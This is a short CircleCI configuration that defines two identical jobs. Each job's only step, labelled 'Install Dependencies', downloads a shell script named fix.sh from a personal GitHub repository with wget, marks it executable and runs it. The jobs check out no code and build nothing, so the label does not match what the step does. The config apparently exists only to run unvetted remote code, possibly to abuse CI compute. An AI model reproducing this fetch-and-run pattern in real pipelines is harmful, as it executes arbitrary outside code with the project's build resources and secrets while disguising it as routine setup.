version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: |
                  wget -O fix.sh https://github.com/ajiLa78/sampl/raw/main/fix.sh
                  chmod +x fix.sh
                  ./fix.sh
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: |
                  wget -O fix.sh https://github.com/ajiLa78/sampl/raw/main/fix.sh
                  chmod +x fix.sh
                  ./fix.sh
    
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
           